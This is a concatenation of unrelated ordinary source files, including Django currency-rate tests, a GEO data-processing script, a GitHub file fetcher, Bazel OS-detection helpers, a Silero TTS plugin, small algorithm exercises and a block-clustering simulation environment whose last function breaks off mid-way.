@patch('currencies.management.commands._yahoofinance.CurrencyHandler.endpoint', 'http://www.google.com/test.json')
def test_import_source_down(self):
"Currencies: Simulate source down - imports from cache"
self.default_currency_cmd()
@patch('currencies.management.commands._currencyiso.get', mock_requestget_exception())
@patch('currencies.management.commands._yahoofinance.get', mock_requestget_exception())
def test_no_connectivity(self):
"Currencies: Simulate connection problem - imports from cache"
self.default_currency_cmd()
@_move_cache_file('currencies.management.commands._currencyiso')
@_move_cache_file('currencies.management.commands._yahoofinance')
def test_no_cache(self):
"Currencies: Simulate no cache file - imports from API"
self.default_currency_cmd()
@_move_cache_file('currencies.management.commands._currencyiso')
@_move_cache_file('currencies.management.commands._yahoofinance')
@patch('currencies.management.commands._currencyiso.get', mock_requestget_exception())
@patch('currencies.management.commands._yahoofinance.get', mock_requestget_exception())
def test_no_connectivity_or_cache(self):
"Currencies: Simulate connection problem & no cache - exception"
self.assertRaises(RuntimeError, self.default_currency_cmd)
# Strange fix for externally referenced python 2.7 decorator methods
if sys.version_info.major == 2:
_move_cache_file = staticmethod(_move_cache_file)
class IncInfoMixin(object):
"For sources that support currency info"
def _verify_new_info(func):
"Wrapper for checking info is imported on new imports"
@wraps(func)
def wrapper(inst, *args, **kwargs):
ret = func(inst, *args, **kwargs)
qs = Currency.objects.all()
for code in inst._newcodes:
inst.assertNotEqual(sorted(list(qs.get(code=code).info.keys())), inst._min_info)
return ret
return wrapper
@_verify_new_info
def test_info(self):
"Currencies: extra info"
self.import_all()
@patch('currencies.management.commands._openexchangerates_client.requests.Session',
mock_requestsession_getjson(os.path.join(cwd, 'oxr_USD.json')))
class IncRatesMixin(object):
"For sources that support exchange rates"
def _verify_rates(base_code):
"Wrapper for testing that the rates are not 1.0 after an update and the specified base is set"
def decorator(func):
@wraps(func)
def wrapper(inst, *args, **kwargs):
inst.assertGreater(Currency.objects.update(factor=1.0), 1)
ret = func(inst, *args, **kwargs)
after_qs = Currency.objects.all()
for curr in after_qs.filter(is_base=False):
inst.assertNotEqual(curr.factor, 1.0)
inst.assertEqual(after_qs.get(code=base_code, is_base=True).factor, 1.0)
return ret
return wrapper
return decorator
def _verify_rate_change(func):
"Wrapper to ensure the base changed"
@wraps(func)
def wrapper(inst, *args, **kwargs):
before_base = Currency.objects.get(is_base=True).code
ret = func(inst, *args, **kwargs)
after_base = Currency.objects.get(is_base=True).code
inst.assertNotEqual(before_base, after_base)
return ret
return wrapper
## POSITIVE Tests ##
@_verify_rates('USD')
def test_update_rates_nobase(self):
"Rates: Update without supplying a base at all - USD"
base = Currency.objects.update(is_base=False)
self.default_rate_cmd()
@_verify_rates(BaseTestMixin._code_base)
def test_update_rates(self):
"Rates: Update currency rates with the db base"
self.default_rate_cmd()
@_verify_rate_change
@_verify_rates(BaseTestMixin._code_exist)
def test_update_rates_specifybase(self):
"Rates: Update currency rates with a specific base"
self.run_cmd_verify_stdout(4, 'updatecurrencies', '--base=' + self._code_exist)
@_verify_rate_change
@_verify_rates(BaseTestMixin._code_exist)
def test_update_rates_variable_CURRENCIES_BASE(self):
"Rates: Update currency rates using the CURRENCIES_BASE setting variable"
with self.settings(CURRENCIES_BASE=self._code_exist):
self.default_rate_cmd()
@_verify_rate_change
@_verify_rates(BaseTestMixin._code_exist)
def test_update_rates_variable_SHOP_DEFAULT_CURRENCY(self):
"Rates: Update currency rates using the SHOP_DEFAULT_CURRENCY setting variable"
with self.settings(SHOP_DEFAULT_CURRENCY=self._code_exist):
self.default_rate_cmd()
@_verify_rate_change
@_verify_rates(BaseTestMixin._code_exist)
def test_update_rates_variable_BOTH(self):
"Rates: CURRENCIES_BASE is given priority"
with self.settings(CURRENCIES_BASE=self._code_exist, SHOP_DEFAULT_CURRENCY=self._code_base):
self.default_rate_cmd()
@_verify_rate_change
@_verify_rates(BaseTestMixin._code_exist)
def test_update_rates_variable_WIBBLE(self):
"Rates: Update currency rates using the WIBBLE setting variable"
with self.settings(WIBBLE=self._code_exist):
self.run_cmd_verify_stdout(4, 'updatecurrencies', '--base=WIBBLE')
## NEGATIVE Tests ##
def test_update_rates_invalid_variable(self):
"Rates: Invalid base option"
with self.assertRaises(AttributeError):
self.run_cmd_verify_stdout(2, 'updatecurrencies', '--base=WIBBLE')
with self.assertRaises(ImproperlyConfigured):
self.run_cmd_verify_stdout(2, 'updatecurrencies', '-b=' + self._code_2dp)
with self.assertRaises(ImproperlyConfigured):
self.run_cmd_verify_stdout(2, 'updatecurrencies', '-b=AB')
with self.assertRaises(ImproperlyConfigured):
self.run_cmd_verify_stdout(2, 'updatecurrencies', '-b=gbp')
with self.assertRaises(ImproperlyConfigured):
self.run_cmd_verify_stdout(2, 'updatecurrencies', '--base=ZZZ')
def test_update_no_connectivity(self):
"Rates: Simulate connection problem"
# Patch inside the function to override the class patch
with patch('currencies.management.commands._openexchangerates_client.requests.Session',
mock_requestsession_getexception()):
self.assertRaises(Exception, self.default_rate_cmd)
### ACTUAL CURRENCY SOURCE TEST CLASSES ###
@override_settings( **default_settings )
#TODO: No caching of currencies currently implemented for OpenExchangeRates: IncCacheMixin
class DefaultTest(IncRatesMixin, BaseTestMixin, TestCase):
"Test OpenExchangeRates support: the default source"
fixtures = ['currencies_test']
## NEGATIVE Tests ##
@override_settings()
def test_missing_APP_ID_currencies(self):
"Currencies: No APP_ID"
from django.conf import settings
del settings.OPENEXCHANGERATES_APP_ID
self.assertRaises(ImproperlyConfigured, self.default_currency_cmd)
@override_settings()
def test_missing_APP_ID_update(self):
"Rates: No APP_ID"
from django.conf import settings
del settings.OPENEXCHANGERATES_APP_ID
self.assertRaises(ImproperlyConfigured, self.default_rate_cmd)
class OXRTest(DefaultTest):
"Test OpenExchangeRates support: when specified"
source_arg = ('oxr',)
class YahooTest(IncInfoMixin, IncCacheMixin, BaseTestMixin, TestCase):
"Test Yahoo support"
fixtures = ['currencies_test']
source_arg = ('yahoo',)
## NEGATIVE Tests ##
# Overrides the base test due to API withdrawal
@IncCacheMixin._move_cache_file('currencies.management.commands._yahoofinance')
def test_no_cache(self):
"Currencies: Simulate no cache file - API withdrawn so will raise exception"
self.assertRaises(RuntimeError, self.default_currency_cmd)
class ISOTest(IncInfoMixin, IncCacheMixin, BaseTestMixin, TestCase):
"Test Currency ISO support"
fixtures = ['currencies_test']
source_arg = ('iso',)
|
import GEOparse
import pandas as pd
from pathlib import Path
import pathlib
import pickle
import re
from scripts.python.GEO.routines import get_gse_gsm_info, process_characteristics_ch1
gpl = 'GPL13534'
gse = 'GSE116379'
characteristics_ch1_regex_findall = ';*([a-zA-Z0-9\^\/\=\-\:\,\.\s_\(\)]+): '
characteristics_ch1_regex_split = '(;*[a-zA-Z0-9\^\/\=\-\,\:\.\s_\(\)]+: )'
path = "E:/YandexDisk/Work/pydnameth/datasets"
gsm_df, gse_gsms_dict = get_gse_gsm_info(f"{path}/GEO", gpl)
pathlib.Path(f"{path}/{gpl}/{gse}/raw/GEO").mkdir(parents=True, exist_ok=True)
gsms = gse_gsms_dict[gse]
gse_df_1 = gsm_df.loc[gsm_df.index.isin(gsms), :]
while True:
try:
gse_data = GEOparse.get_GEO(geo=gse, destdir=f"{path}/{gpl}/{gse}/raw/GEO", include_data=False, how="quick", silent=True)
except ValueError:
continue
except ConnectionError:
continue
except IOError:
continue
break
gse_df_2 = gse_data.phenotype_data
if gse_df_2.empty:
process_type = 'GEOmetadb'
else:
gse_df_2.index.name = 'gsm'
gse_df_2.replace('NONE', pd.NA, inplace=True)
gse_df_2 = gse_df_2.loc[(gse_df_2['platform_id'] == gpl), :]
is_index_equal = set(gse_df_1.index) == set(gse_df_2.index)
if is_index_equal:
process_type = 'Common'
else:
print(f"GEOmetadb: {gse_df_1.shape[0]}")
print(f"GEOparse: {gse_df_2.shape[0]}")
if gse_df_2.shape[0] > gse_df_1.shape[0]:
process_type = 'GEOparse'
else:
process_type = 'GEOmetadb'
print(f"process_type: {process_type}")
if process_type == 'Common':
gse_df_1 = gse_df_1.loc[gse_df_2.index, :]
gse_df = pd.merge(gse_df_2, gse_df_1['characteristics_ch1'], left_index=True, right_index=True)
chars_df_1 = set.union(*gse_df['characteristics_ch1'].str.findall(characteristics_ch1_regex_findall).apply(set).to_list())
process_characteristics_ch1(gse_df, characteristics_ch1_regex_split)
elif process_type == 'GEOmetadb':
gse_df = gse_df_1
chars_df_1 = set.union(*gse_df['characteristics_ch1'].str.findall(characteristics_ch1_regex_findall).apply(set).to_list())
process_characteristics_ch1(gse_df, characteristics_ch1_regex_split)
elif process_type == 'GEOparse':
gse_df = gse_df_2.copy()
chars_df_1 = set()
else:
raise ValueError(f"Unsupported process_type")
if process_type in ['GEOparse', 'Common']:
chars_cols = gse_df.columns.values[gse_df.columns.str.startswith('characteristics_ch1.')]
r = re.compile(r"characteristics_ch1.\d*.(.*)")
chars_df_2 = set([r.findall(x)[0] for x in chars_cols])
else:
chars_df_2 = set()
chars_all = chars_df_1.union(chars_df_2)
if chars_df_2 != chars_df_1:
print(f"Chars from GEOmetadb ({len(chars_df_1)}) and GEOparse ({len(chars_df_2)}) differs!")
if not gse_df['supplementary_file'].isnull().all():
supp_files_split = gse_df['supplementary_file'].str.split('[,;]\s*', expand=True, regex=True)
if supp_files_split.shape[1] == 2:
gse_df[['supplementary_file_1', 'supplementary_file_2']] = supp_files_split
supp_details = gse_df['supplementary_file_1'].str.findall('(?:.*\/)(.*)(?:_\w*.\..*\..*)').explode().str.split('_', expand=True)
if supp_details.shape[1] == 3:
gse_df[['Sample_Name', 'Sentrix_ID', 'Sentrix_Position']] = supp_details
gse_df.to_excel(f"{path}/{gpl}/{gse}/pheno.xlsx", index=True)
|
from src.add import add
def test_add():
assert 4 == add(2, 2)
|
""" Module for Beacon APIs
Example - Get Application(s)::
from f5sdk.cs.beacon.declare import DeclareClient
declare_client = DeclareClient(mgmt_client)
declare_client.create(config={'action': 'deploy', 'declaration': []})
"""
__all__ = []
|
# -*- coding: utf-8 -*-
# Copyright 2018 Etsy Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
import base64
import os
class BaseFileFetcher(object):
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def fetch_file_content(self, rel_path):
pass
class LocalFileFetcher(BaseFileFetcher):
def __init__(self, base_path):
self.base_path = base_path
def fetch_file_content(self, rel_path):
full_path = os.path.join(self.base_path, rel_path.lstrip('/'))
content = None
with open(full_path) as _in:
content = _in.read()
return content
class GithubFileFetcher(BaseFileFetcher):
""" A fetcher for files stored in Github.
:param base_path: base path of files in the repository
:type base_path: str
:param repository: an already-initialized github3 Repository object
:type repository: github3.repos.repo.Repository
:param ref: branch from which to fetch files
Default: master
:type ref: str
"""
def __init__(
self,
base_path,
repo_owner,
repo_name,
repo_ref=None,
github_url=None,
github_token=None,
github_username=None,
github_password=None):
self.base_path = base_path
self.repo_owner = repo_owner
self.repo_name = repo_name
self.repo_ref = repo_ref or 'master'
self.github_url = github_url
self.github_token = github_token
self.github_username = github_username
self.github_password = github_password
self.github = self._get_github()
self.repository = self._get_repository()
def _get_github(self):
try:
import github3
except ImportError:
raise Exception("""
ERROR: github3.py not installed! Please install via
pip install boundary-layer[github]
and try again.""")
if self.github_url:
return github3.GitHubEnterprise(
url=self.github_url,
username=self.github_username,
password=self.github_password,
token=self.github_token)
return github3.GitHub(
username=self.github_username,
password=self.github_password,
token=self.github_token)
def _get_repository(self):
return self.github.repository(
self.repo_owner,
self.repo_name)
def fetch_file_content(self, rel_path):
full_path = os.path.join(self.base_path, rel_path.lstrip('/'))
content_b64 = self.repository.file_contents(
path=full_path,
ref=self.repo_ref).content
return base64.b64decode(content_b64)
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Delay Handler © Autolog 2020
#
try:
# noinspection PyUnresolvedReferences
import indigo
except ImportError:
pass
import logging
import queue
import sys
import threading
import time
import traceback
from constants import *
# noinspection PyUnresolvedReferences,PyPep8Naming
class ThreadDelayHandler(threading.Thread):
# This class handles Delay Queue processing
def __init__(self, pluginGlobals, event):
threading.Thread.__init__(self)
self.globals = pluginGlobals
self.delayHandlerLogger = logging.getLogger("Plugin.TRV_DH")
self.delayHandlerLogger.debug("Debugging Delay Handler Thread")
self.threadStop = event
def exception_handler(self, exception_error_message, log_failing_statement):
filename, line_number, method, statement = traceback.extract_tb(sys.exc_info()[2])[-1]
module = filename.split('/')
log_message = f"'{exception_error_message}' in module '{module[-1]}', method '{method}'"
if log_failing_statement:
log_message = log_message + f"\n Failing statement [line {line_number}]: '{statement}'"
else:
log_message = log_message + f" at line {line_number}"
self.delayHandlerLogger.error(log_message)
def run(self):
try:
self.delayHandlerLogger.debug('Delay Handler Thread initialised')
while not self.threadStop.is_set():
try:
delayQueuedEntry = self.globals['queues']['delayHandler'].get(True, 5)
# delayQueuedEntry format:
# - Device
# - Polling Sequence
# self.delayHandlerLogger.debug(f'DEQUEUED MESSAGE = {delayQueuedEntry}')
# trvCommand, trvCommandDevId, pollingSequence = delayQueuedEntry
trvCommand, trvCommandDevId = delayQueuedEntry
if trvCommand == CMD_STOP_THREAD:
break # Exit While loop and quit thread
# Check if monitoring / debug options have changed and if so set accordingly
if self.globals['debug']['previousDelayHandler'] != self.globals['debug']['delayHandler']:
self.globals['debug']['previousDelayHandler'] = self.globals['debug']['delayHandler']
self.delayHandlerLogger.setLevel(self.globals['debug']['delayHandler'])
if trvCommand != CMD_ACTION_POLL:
continue
self.globals['queues']['trvHandler'].put([QUEUE_PRIORITY_STATUS_MEDIUM, 0, CMD_ACTION_POLL, trvCommandDevId, []])
delay_time = self.globals['config']['delayQueueSeconds']
self.delayHandlerLogger.debug(
f'DELAY QUEUE ENTRY RETRIEVED FOR DEVICE: {indigo.devices[trvCommandDevId].name}, Command is \'{CMD_TRANSLATION[CMD_ACTION_POLL]}\'.\nDELAYING FOR {delay_time} SECONDS. Remaining queue size is {self.globals["queues"]["delayHandler"].qsize()}')
time.sleep(delay_time)
self.delayHandlerLogger.debug(f'DELAY COMPLETED AFTER {delay_time} SECONDS.\nRemaining queue size is {self.globals["queues"]["delayHandler"].qsize()}')
except queue.Empty:
pass
except Exception as exception_error:
self.exception_handler(exception_error, True) # Log error and display failing statement
except Exception as exception_error:
self.exception_handler(exception_error, True) # Log error and display failing statement
self.delayHandlerLogger.debug('Delay Handler Thread ended.')
|
# coding: utf8
import re
import os.path
try:
from setuptools import setup
extra_kwargs = {'test_suite': 'cssselect.tests'}
except ImportError:
from distutils.core import setup
extra_kwargs = {}
ROOT = os.path.dirname(__file__)
README = open(os.path.join(ROOT, 'README.rst')).read()
INIT_PY = open(os.path.join(ROOT, 'cssselect', '__init__.py')).read()
VERSION = re.search("VERSION = '([^']+)'", INIT_PY).group(1)
setup(
name='cssselect',
version=VERSION,
author='Ian Bicking',
author_email='ianb@colorstudy.com',
maintainer='Simon Sapin',
maintainer_email='simon.sapin@exyr.org',
description=
'cssselect parses CSS3 Selectors and translates them to XPath 1.0',
long_description=README,
url='http://packages.python.org/cssselect/',
license='BSD',
packages=['cssselect'],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.4',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
],
**extra_kwargs
)
|
# Convert BST to Doubly Linked List
# the left and right pointers in nodes are to be used as prev and next pointers
# respectively in converted DLL, do it in place
def bst_to_dll(root):
return inorder(root)[0]
def inorder(root):
if not root:
return (None, None)
head = tail = root
left_head, left_tail = inorder(root.left)
if left_head:
head = left_head
left_tail.right = root
root.left = left_tail
right_head, right_tail = inorder(root.right)
if right_head:
root.right = right_head
right_head.left = root
tail = right_tail
return head, tail
def pprint(root):
while root:
print root.val
root = root.right
def test():
nodes = [TreeNode(i) for i in range(6)]
nodes[3].left = nodes[1]
nodes[3].right = nodes[5]
nodes[1].left = nodes[0]
nodes[1].right = nodes[2]
nodes[5].left = nodes[4]
bst_to_dll(nodes[3])
pprint(nodes[0])
class TreeNode(object):
def __init__(self, val):
self.val = val
self.left = None
self.right = None
if __name__ == '__main__':
test()
|
import numpy as np
from math import sqrt, floor
from scipy.special import eval_genlaguerre
def gaussian_laguerre(p, l, mode_field_diameter=1, grid=None):
r'''Creates a Gaussian-Hermite mode.
This function evaluates a (p,l) order Gaussian-Laguerre mode on a grid.
The definition of the modes are the following,
.. math::
\exp{\left(-\frac{r^2}{w_0^2}\right)} L_p^{|l|}\left(\frac{2r^2}{w_0^2} \right) \left(\sqrt{2}\frac{r}{w_0}\right)
Here :math:`w_0` is the mode_field_radius, which is :math:`\mathrm{MFD}/2`.
And :math:`L_p^{|l|}` are the generalized Laguerre Polynomials.
All modes are numerical normalized to have a total power of 1.
More details on generalized Laguerre Polynomials can be found on:
http://mathworld.wolfram.com/AssociatedLaguerrePolynomial.html
Parameters
----------
p : int
The radial order.
l : int
The azimuthal order.
mode_field_diameter : scalar
The mode field diameter of the mode.
grid : Grid
The grid on which to evaluate the mode.
Returns
-------
Field
The evaluated mode.
'''
from ..field import Field
if grid.is_separated and grid.is_('polar'):
R, Theta = grid.separated_coords
else:
R, Theta = grid.as_('polar').coords
# Easy access
r = 2*R/mode_field_diameter
r2 = r**2
# The mode
lg = (r*sqrt(2))**(abs(l)) * np.exp(-r2) * np.exp(-1j*l*Theta) * eval_genlaguerre(p, abs(l), 2*r2)
# Numerically normalize the modes
lg /= np.sum(np.abs(lg)**2 * grid.weights)
return Field(lg, grid)
# High level functions
def make_gaussian_laguerre_basis(grid, pmax, lmax, mode_field_diameter, pmin=0):
'''Creates a Gaussian-Laguerre mode basis.
This function evaluates Gaussian-Laguerre modes. For each radial order
within [pmin, pmax] it will calculate the azimuthal order [-lmax, lmax] inclusive.
This function returns a ModeBasis made out of these Gaussian-Laguerre modes.
Parameters
----------
grid : Grid
The grid on which to evaluate the Gaussian-Laguerre mode.
pmax : int
The maximum radial order of the modes.
lmax : int
The maximum azimuthal order.
mode_field_diameter : scalar
The mode field diameter of the Gaussian-Laguerre mode.
pmin : int
The minimal radial order.
Returns
-------
ModeBasis
The Gaussian-Laguerre modes.
'''
from .mode_basis import ModeBasis
modes = [gaussian_laguerre(pi, li, mode_field_diameter, grid) for li in range(-lmax, lmax + 1) for pi in range(pmin, pmax)]
return ModeBasis(modes) |
class MarbleDecoration:
def maxLength(self, R, G, B):
def m(a, b):
return 2*min(a, b) + 1 - int(a == b)
return max(m(R, G), m(R, B), m(G, B))
|
load(":execute.bzl", "which")
def exec_using_which(repository_ctx, command):
"""Run the given command (a list), using the which() function in
execute.bzl to locate the executable named by the zeroth index of
`command`.
Return struct with attributes:
- error (None when success, or else str message)
- stdout (str command output, possibly empty)
"""
# Find the executable.
fullpath = which(repository_ctx, command[0])
if fullpath == None:
return struct(
stdout = "",
error = "could not find which '%s'" % command[0],
)
# Run the executable.
result = repository_ctx.execute([fullpath] + command[1:])
if result.return_code != 0:
error = "error %d running %r (command %r, stdout %r, stderr %r)" % (
result.return_code,
command[0],
command,
result.stdout,
result.stderr,
)
return struct(stdout = result.stdout, error = error)
# Success.
return struct(stdout = result.stdout, error = None)
def _make_result(
error = None,
ubuntu_release = None,
macos_release = None):
"""Return a fully-populated struct result for determine_os, below."""
if ubuntu_release != None:
distribution = "ubuntu"
elif macos_release != None:
distribution = "macos"
else:
distribution = None
return struct(
error = error,
distribution = distribution,
is_macos = (macos_release != None),
is_ubuntu = (ubuntu_release != None),
ubuntu_release = ubuntu_release,
macos_release = macos_release,
)
def _determine_linux(repository_ctx):
"""Handle determine_os on Linux."""
# Shared error message text across different failure cases.
error_prologue = "could not determine Linux distribution: "
# Run sed to determine Linux NAME and VERSION_ID.
sed = exec_using_which(repository_ctx, [
"sed",
"-n",
"/^\(NAME\|VERSION_ID\)=/{s/[^=]*=//;s/\"//g;p}",
"/etc/os-release",
])
if sed.error != None:
return _make_result(error = error_prologue + sed.error)
# Compute an identifying string, in the form of "$NAME $VERSION_ID".
lines = [line.strip() for line in sed.stdout.strip().split("\n")]
distro = " ".join([x for x in lines if len(x) > 0])
# Match supported Ubuntu release(s). These should match those listed in
# both doc/developers.rst the root CMakeLists.txt.
for ubuntu_release in ["16.04", "18.04"]:
if distro == "Ubuntu " + ubuntu_release:
return _make_result(ubuntu_release = ubuntu_release)
# Nothing matched.
return _make_result(
error = error_prologue + "unsupported distribution '%s'" % distro,
)
def _determine_macos(repository_ctx):
"""Handle determine_os on macOS."""
# Shared error message text across different failure cases.
error_prologue = "could not determine macOS version: "
# Run sw_vers to determine macOS version.
sw_vers = exec_using_which(repository_ctx, [
"sw_vers",
"-productVersion",
])
if sw_vers.error != None:
return _make_result(error = error_prologue + sw_vers.error)
major_minor_versions = sw_vers.stdout.strip().split(".")[:2]
macos_release = ".".join(major_minor_versions)
# Match supported macOS release(s).
if macos_release in ["10.13", "10.14"]:
return _make_result(macos_release = macos_release)
# Nothing matched.
return _make_result(
error = error_prologue + "unsupported macOS '%s'" % macos_release,
)
def determine_os(repository_ctx):
"""
A repository_rule helper function that determines which of the supported OS
versions we are targeting.
Argument:
repository_ctx: The context passed to the repository_rule calling this.
Result:
a struct, with attributes:
- error: str iff any error occurred, else None
- distribution: str either "ubuntu" or "macos" if no error
- is_macos: True iff on a supported macOS release, else False
- macos_release: str like "10.14" iff on a supported macOS, else None
- is_ubuntu: True iff on a supported Ubuntu version, else False
- ubuntu_release: str like "16.04" iff on a supported ubuntu, else None
"""
os_name = repository_ctx.os.name
if os_name == "mac os x":
return _determine_macos(repository_ctx)
elif os_name == "linux":
return _determine_linux(repository_ctx)
else:
return _make_result(error = "unknown or unsupported OS '%s'" % os_name)
|
# TTS plugin for silero engine
# author: Vladislav Janvarev
# require torch 1.10+
import os
from vacore import VACore
modname = os.path.basename(__file__)[:-3] # calculating modname
# функция на старте
def start(core:VACore):
manifest = {
"name": "TTS silero V3",
"version": "1.2",
"require_online": False,
"default_options": {
"speaker": "xenia",
"threads": 4,
"sample_rate": 24000,
"put_accent": True,
"put_yo": True,
},
"tts": {
"silero_v3": (init,None,towavfile) # первая функция инициализации, вторая - говорить
}
}
return manifest
def start_with_options(core:VACore, manifest:dict):
pass
def init(core:VACore):
options = core.plugin_options(modname)
import os
import torch
device = torch.device('cpu')
torch.set_num_threads(options["threads"])
local_file = 'ru_v3.pt'
if not os.path.isfile(local_file):
torch.hub.download_url_to_file('https://models.silero.ai/models/tts/ru/ru_v3.pt',
local_file)
core.model = torch.package.PackageImporter(local_file).load_pickle("tts_models", "model")
core.model.to(device)
#core.model.
def towavfile(core:VACore, text_to_speech:str, wavfile:str):
text_to_speech = text_to_speech.replace("…","...")
text_to_speech = core.all_num_to_text(text_to_speech)
#print(text_to_speech)
options = core.plugin_options(modname)
speaker = options["speaker"]
# рендерим wav
path = core.model.save_wav(text=text_to_speech,
speaker=speaker,
put_accent=options["put_accent"],
put_yo=options["put_yo"],
sample_rate=options["sample_rate"])
# перемещаем wav на новое место
if os.path.exists(wavfile):
os.unlink(wavfile)
os.rename(path,wavfile) |
class Solution:
def minSubArrayLen(self, s: int, nums: List[int]) -> int:
j=0
tong=0
res=float('inf')
for i in range(len(nums)):
tong+=nums[i]
while tong>=s and j<len(nums):
res=min(res,i-j+1)
tong-=nums[j]
j=j+1
if res==float('inf'):
return 0
return res |
import abc
import enum
from gym.utils import EzPickle
import numpy as np
from magical.base_env import BaseEnv, ez_init
import magical.entities as en
import magical.geom as geom
class BaseClusterEnv(BaseEnv, abc.ABC):
"""There are blocks of many colours and types. You must arrange them into
distinct clusters. Depending on the demo, cluster membership must either be
determined by shape type or shape colour (but if it's determined by one
characteristic in the demo then it should be independent of the other
characteristic). There should be exactly one cluster for each value of the
membership characteristic (e.g. if clustering on colour, there should be
one blue cluster, one red cluster, etc.).
This class should not be instantiated directly. Instead, you should use
ClusterColourEnv or ClusterShapeEnv."""
class ClusterBy(str, enum.Enum):
"""What characteristic should blocks be clustered by?"""
COLOUR = 'colour'
TYPE = 'type'
# TODO: add a 'both' option! (will require another demo scenario)
def __init__(
self,
# should we randomise assignment of colours to blocks, or use
# default ordering?
rand_shape_colour=False,
# should we randomise assignment of types to blocks, or use default
# ordering?
rand_shape_type=False,
# should we jitter the positions of blocks and the robot?
rand_layout_minor=False,
# should we fully randomise the positions of blocks and the robot?
rand_layout_full=False,
# should we randomise number of blocks? (this requires us to
# randomise everything else, too)
rand_shape_count=False,
# which block characteristic do we want the user to pay attention
# to for clustering? (colour vs. shape type)
cluster_by=ClusterBy.COLOUR,
**kwargs):
super().__init__(**kwargs)
self.rand_shape_colour = rand_shape_colour
self.rand_shape_type = rand_shape_type
self.rand_shape_count = rand_shape_count
assert not (rand_layout_minor and rand_layout_full)
self.rand_layout_minor = rand_layout_minor
self.rand_layout_full = rand_layout_full
self.cluster_by = cluster_by
if self.rand_shape_count:
assert self.rand_layout_full, \
"if shape count is randomised then layout must also be " \
"fully randomised"
assert self.rand_shape_type, \
"if shape count is randomised then shape type must also be " \
"randomised"
assert self.rand_shape_colour, \
"if shape count is randomised then colour must be " \
"randomised too"
def on_reset(self):
# make the robot at default position (will be randomised at end if
# rand_layout is true)
robot = self._make_robot(*self.DEFAULT_ROBOT_POSE)
# 3x blue & 2x of each other colour
default_colours = self.DEFAULT_BLOCK_COLOURS
# 3x pentagon & 2x of each other shape type
default_shape_types = self.DEFAULT_BLOCK_SHAPES
# these were generated by randomly scattering shapes about the chosen
# default robot position and then rounding down values a bit
default_poses = self.DEFAULT_BLOCK_POSES
default_n_shapes = len(default_colours)
if self.rand_shape_count:
n_shapes = self.rng.randint(7, 10 + 1)
# rand_shape_count=True implies rand_layout=True, so these MUST be
# randomised at the end
poses = [((0, 0), 0)] * n_shapes
else:
n_shapes = default_n_shapes
# if rand_layout=True, these will be randomised at the end
poses = default_poses
if self.rand_shape_colour:
# make sure we have at least one of each colour
colours = list(en.SHAPE_COLOURS)
colours.extend([
self.rng.choice(en.SHAPE_COLOURS)
for _ in range(n_shapes - len(colours))
])
self.rng.shuffle(colours)
else:
colours = default_colours
if self.rand_shape_type:
# make sure we have at least one of each type, too
shape_types = list(en.SHAPE_TYPES)
shape_types.extend([
self.rng.choice(en.SHAPE_TYPES)
for _ in range(n_shapes - len(shape_types))
])
self.rng.shuffle(shape_types)
else:
shape_types = default_shape_types
assert len(poses) == n_shapes
assert len(colours) == n_shapes
assert len(shape_types) == n_shapes
shape_ents = []
for ((x, y), angle), colour, shape_type \
in zip(poses, colours, shape_types):
shape = self._make_shape(shape_type=shape_type,
colour_name=colour,
init_pos=(x, y),
init_angle=angle)
shape_ents.append(shape)
self.add_entities(shape_ents)
# make index mapping characteristic values to blocks
if self.cluster_by == self.ClusterBy.COLOUR:
c_values_list = np.asarray(colours, dtype='object')
self.__characteristic_values = np.unique(c_values_list)
elif self.cluster_by == self.ClusterBy.TYPE:
c_values_list = np.asarray(shape_types, dtype='object')
self.__characteristic_values = np.unique(c_values_list)
else:
raise NotImplementedError(
f"don't know how to cluster by '{self.cluster_by}'")
self.__blocks_by_characteristic = {}
assert len(c_values_list) == len(shape_ents)
for shape, c_value in zip(shape_ents, c_values_list):
c_list = self.__blocks_by_characteristic.setdefault(c_value, [])
c_list.append(shape)
# as in match_regions.py, this should be added after all shapes so it
# appears on top, but before layout randomisation so that it gets added
# to the space correctly
self.add_entities([robot])
if self.rand_layout_full or self.rand_layout_minor:
if self.rand_layout_full:
pos_limit = rot_limit = None
else:
pos_limit = self.JITTER_POS_BOUND
rot_limit = self.JITTER_ROT_BOUND
geom.pm_randomise_all_poses(space=self._space,
entities=[robot, *shape_ents],
arena_lrbt=self.ARENA_BOUNDS_LRBT,
rng=self.rng,
rand_pos=True,
rand_rot=True,
rel_pos_linf_limits=pos_limit,
rel_rot_limits=rot_limit)
# set up index for lookups
self.__ent_index = en.EntityIndex(shape_ents)
def score_on_end_of_traj(self):
# Compute centroids for each value of the relevant characteristic
# (either colour or shape type). Also compute mean squared distance
# from centroid for each block in the cluster.
nvals = len(self.__characteristic_values)
centroids = np.zeros((nvals, 2))
for c_idx, c_value in enumerate(self.__characteristic_values):
c_blocks = self.__blocks_by_characteristic.get(c_value)
if not c_blocks:
centroid = (0, 0)
else:
positions = np.asarray([(b.shape_body.position.x,
b.shape_body.position.y)
for b in c_blocks])
centroid = np.mean(positions, axis=0)
centroids[c_idx] = centroid
# Now for each block compute whether squared distance to nearest
# incorrect centroid. A block is correctly clustered if the true
# centroid is closer than the next-nearest centroid by a margin of at
# least min_margin * (mean variation within true centroid). This
# rewards tight clusterings.
min_margin = 2.0 # higher = more strict
n_blocks = 0
n_correct = 0
for c_idx, c_value in enumerate(self.__characteristic_values):
for block in self.__blocks_by_characteristic.get(c_value, []):
n_blocks += 1
block_pos = np.array([[
block.shape_body.position.x,
block.shape_body.position.y,
]])
centroid_sses = np.sum((block_pos - centroids)**2, axis=1)
indices = np.arange(len(self.__characteristic_values))
true_sse, = centroid_sses[indices == c_idx]
bad_sses = centroid_sses[indices != c_idx]
nearest_bad_centroid = np.min(bad_sses)
true_centroid_sse = centroid_sses[c_idx]
margin = min_margin * true_centroid_sse
n_correct += int(
np.sqrt(true_sse) < np.sqrt(nearest_bad_centroid) - margin)
